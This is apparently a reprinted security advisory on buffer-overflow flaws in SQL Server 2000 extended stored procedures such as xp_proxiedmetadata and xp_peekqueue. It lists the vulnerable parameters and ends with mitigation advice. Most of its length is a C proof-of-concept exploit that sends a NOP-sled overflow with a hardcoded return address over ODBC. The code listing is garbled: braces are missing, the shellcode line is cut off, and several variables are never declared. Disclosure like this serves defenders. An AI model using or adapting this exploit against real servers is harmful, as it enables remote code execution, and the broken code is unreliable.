MS SQL Server
MS SQL Server 2000
Following is based on a @stake Security Advisory. This advisory
details multiple vulnerabilities in Microsoft SQL Server 2000
that allow an attacker to run arbitrary code on the SQL server in
the context of a local administrator account. This was found by
Chris Anley.
SQL Server provides a mechanism by which a database query can
result in a call into a function called an "extended stored
procedure". Several extended stored procedures supplied with SQL
Server 2000 are vulnerable to buffer overflow attacks.
Furthermore, in a default configuration these extended stored
procedures can be executed by any user.
Extended stored procedures can be called by any client component
that can issue a normal SQL Server query, such as Microsoft
Access, or MSQuery. The ISQL utility, which is supplied with SQL
Server, can also be used to call extended stored procedures. Web
applications running on Internet Information Server frequently
use the ActiveX Data Objects (ADO) API to connect to SQL Server
The syntax for calling extended stored procedures is as follows:
exec <stored procedure name> <arg1>, <arg2>, ...
For example, the following query will return a directory tree of
the "c:\winnt" directoy:
exec xp_dirtree 'c:\winnt'
By passing extremely long strings for various parameters, it is
possible to overrun the buffer space allocated for these
parameters and execute arbitrary code.
The following extended stored procedures are vulnerable:
xp_peekqueue (xpqueue.dll), and xp_printstatements (xprepl.dll)
An overly long string passed for the first parameter will cause an
access violation and overwrite the exception handler's saved
return address.
xp_proxiedmetadata (xprepl.dll)
Takes four parameters. An overly long string for the second will
cause an access violation and overwrite the exception handler's
saved return address.
xp_SetSQLSecurity (xpstar.dll)
Takes four parameters. An overly long string passed for the third
parameter will cause an exception that results in the immediate
termination of the entire SQL Server process.
Proof of Concept:
Here is the code:
// SQL2KOverflow.c
// This code creates a file called 'SQL2KOverflow.txt' in the root of the
// c: drive.
#include <stdio.h>
#include <windows.h>
#include <wchar.h>
#include <lmcons.h>
#include <sql.h>
#include <sqlext.h>
int Syntax()
printf( "Syntax error. Correct syntax is:\nSQL2KOverflow
<hostname> <username> <password>");
return 1;
int main(int argc, char *argv[])
char szBuffer[1025];
SWORD swStrLen;
HSTMT hstmt;
SCHAR InConnectionString[1025] = "DRIVER={SQL Server};SERVER=";
UCHAR query[20000] = "exec xp_proxiedmetadata 'a', '";
int count;
if ( argc != 4 )
return Syntax();
if ( ( strlen( argv[1] ) > 250 ) ||
( strlen( argv[2] ) > 250 ) ||
( strlen( argv[3] ) > 250 ) )
return Syntax();
strcat( InConnectionString, argv[1] );
strcat( InConnectionString, ";UID=" );
strcat( InConnectionString, argv[2] );
strcat( InConnectionString, ";PWD=" );
strcat( InConnectionString, argv[3] );
strcat( InConnectionString, ";DATABASE=master" );
for ( count = 30; count < 2598; count++ )
query[count] = (char)0x90;
query[count] = 0;
// 0x77782548 = wx%H = this works sp0
strcat( query, "\x48\x25\x78\x77" );
strcat( query,
strcat( query, "', 'a', 'a'" );
printf("Error SQLAllocHandle");
return 0;
printf("Error SQLSetEnvAttr");
return 0;
if ((nResult = SQLAllocHandle(SQL_HANDLE_DBC,henv,(SQLHDBC FAR
*)&hdbc)) != SQL_SUCCESS)
printf("SQLAllocHandle - 2");
return 0;
nResult = SQLDriverConnect(hdbc, NULL, InConnectionString,
strlen(InConnectionString), szBuffer, 1024, &swStrLen,
if(( nResult == SQL_SUCCESS ) | ( nResult ==
printf("Connected to MASTER database...\n\n");
if(SQLExecDirect(hstmt,query,SQL_NTS) ==SQL_SUCCESS)
printf("\nSQL Query error");
return 0;
printf("Buffer sent...");
return 0;
Disallow PUBLIC execute access to these extended stored procedures
usless you need it. Install the vendor supplied patch. Microsoft
has released a patch to fix this problem: